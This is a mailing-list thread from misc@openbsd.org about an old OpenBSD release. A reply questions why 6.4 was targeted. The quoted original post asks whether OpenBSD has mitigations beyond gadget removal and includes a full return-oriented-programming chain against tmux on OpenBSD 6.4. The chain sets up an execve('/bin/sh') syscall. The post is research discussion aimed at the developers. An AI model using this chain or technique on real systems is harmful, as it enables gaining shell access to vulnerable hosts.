Why are you targeting 6.4? That was released in 2018. So, that's 5 years and 9
releases since then and another one is happening soon.
Sent: Thursday, September 21, 2023 at 8:50 AM
From: "Nan ZoE" <zoen...@gmail.com>
To: misc@openbsd.org
Subject: ROP Exploitation in openbsd-64 Programs After Removing ROP Gadgets
Hello,
I have read your paper regarding the ROP mitigation mechanism (Removing ROP
Gadgets from OpenBSD), and I find the defense against ROP quite ingenious.
The paper introduces the bytecode for 'ret' as '\xc3,' and its association
with the use of the 'rbx' register was a surprising revelation.
Subsequently, you adjusted the prioritization of the 'rbx' register during
compilation, effectively filtering out a significant number of 'ret'-ending
gadgets. This especially removed many misaligned 'ret'-ending gadgets, and
this technique has been applied to openbsd-63, 64, and 65. While the number
of 'ret'-ending gadgets has been significantly reduced, there are still
numerous 'call'-ending gadgets in the program. Security researchers can
still employ many 'call'-ending gadgets to carry out ROP attacks. Even in
programs of only a few hundred kilobytes, I have found that we can still
invoke the execve("/bin/sh", 0, 0) function using only the available
gadgets in the program, albeit it may require a combination of multiple
gadgets and some effort to achieve. I am curious if there are any further
ROP mitigation measures to address this issue? Additionally, I have
provided an ROP attack example targeting the tmux program in OpenBSD-64, as
shown below.
payload = p64(0x4017ce)
#0x00000000004017ce: pop r13; pop r14; pop r15; ret;
payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret;
payload += p64(0x4017d1)+p64(0x403dd3)
# 0x0000000000403dd3: xchg eax, ebp; ret;
payload += p64(0x412208)
# 0x0000000000412208: mov rcx, r13; call rax;
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret;
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret;
payload += p64(0x40125d)+p64(0x403dd3)
# 0x0000000000403dd3: xchg eax, ebp; ret;
payload += p64(0x427a31)
# 0x0000000000427a31: pop rbx; pop rbp; jmp rax;
payload += p64(0x49e0ed)+p64(0x0)
# 0x000000000040125d: pop rbp; ret;
payload += p64(0x4017d1)+p64(0x403dd3)
# 0x0000000000403dd3: xchg eax, ebp; ret;
payload += p64(0x412053)
# 0x0000000000412053: mov r8, rbx; call rax;
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret;
payload += p64(0x0)+p64(0x4551d9)
# 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret;
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret;
payload += p64(0x49e070)+p64(0x40d571)
# 0x000000000040d571: pop rsi; ret;
payload += p64(0x0)+p64(0x4017cf)
# 0x00000000004017cf: pop rbp; pop r14; pop r15; ret;
payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret;
payload += p64(0x49e1d0)+p64(0x42d80b)
# 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov
rax, r14; call rax;
payload += b''
# 0x00000000004017d0: pop r14; pop r15; ret;
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret;
payload += p64(0x3b)+p64(0x403dd3)
# 0x0000000000403dd3: xchg eax, ebp; ret;
payload += p64(0x407fae)
# 0x0000000000407fae: syscall;
payload += b''
Best regards,
ZoE
2023.09.21
